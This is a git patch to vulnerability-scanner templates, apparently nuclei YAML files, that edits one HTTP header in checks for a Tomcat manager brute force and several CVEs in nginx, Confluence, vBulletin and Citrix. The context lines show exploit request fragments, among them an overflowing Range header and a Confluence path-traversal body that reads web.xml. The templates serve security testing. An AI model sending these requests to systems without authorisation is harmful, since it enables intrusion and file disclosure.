From a41edcf8e5bebefb270967b605fa6bd41f5beaa3 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Tue, 4 Aug 2020 03:24:35 +0530 Subject: [PATCH] template mise --- brute-force/tomcat-manager-bruteforce.yaml | 2 +- cves/CVE-2017-7529.yaml | 2 +- cves/CVE-2019-3396.yaml | 2 +- cves/CVE-2020-12720.yaml | 2 +- cves/CVE-2020-8191.yaml | 2 +- cves/CVE-2020-8194.yaml | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/brute-force/tomcat-manager-bruteforce.yaml b/brute-force/tomcat-manager-bruteforce.yaml index b89684ddaf..9ea5377578 100644 --- a/brute-force/tomcat-manager-bruteforce.yaml +++ b/brute-force/tomcat-manager-bruteforce.yaml @@ -29,7 +29,7 @@ requests: Host: {{Hostname}} Authorization: Basic {{base64('username:password')}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 Connection: close diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml index 70cc0575d0..e88cc7726b 100644 --- a/cves/CVE-2017-7529.yaml +++ b/cves/CVE-2017-7529.yaml @@ -16,7 +16,7 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Range: bytes=-17208,-9223372036854758792 - Accept-Encoding: gzip, deflate + Connection: close matchers-condition: and diff --git a/cves/CVE-2019-3396.yaml b/cves/CVE-2019-3396.yaml index 98689f4d21..5aafaa36c2 100644 --- a/cves/CVE-2019-3396.yaml +++ b/cves/CVE-2019-3396.yaml @@ -16,7 +16,7 @@ requests: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}} Content-Length: 168 - Accept-Encoding: gzip, deflate + Connection: close {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} diff --git a/cves/CVE-2020-12720.yaml b/cves/CVE-2020-12720.yaml index 7f581ed242..b7c165a2a7 100644 --- a/cves/CVE-2020-12720.yaml +++ b/cves/CVE-2020-12720.yaml @@ -15,7 +15,7 @@ requests: - | POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate + Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest diff --git a/cves/CVE-2020-8191.yaml b/cves/CVE-2020-8191.yaml index 8a9b936f4c..d1c8bc0d0c 100644 --- a/cves/CVE-2020-8191.yaml +++ b/cves/CVE-2020-8191.yaml @@ -14,7 +14,7 @@ requests: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate + DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 diff --git a/cves/CVE-2020-8194.yaml b/cves/CVE-2020-8194.yaml index 3adea962ef..b265b06b50 100644 --- a/cves/CVE-2020-8194.yaml +++ b/cves/CVE-2020-8194.yaml @@ -13,7 +13,7 @@ requests: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate + DNT: 1 Connection: close Cookie: startupapp=st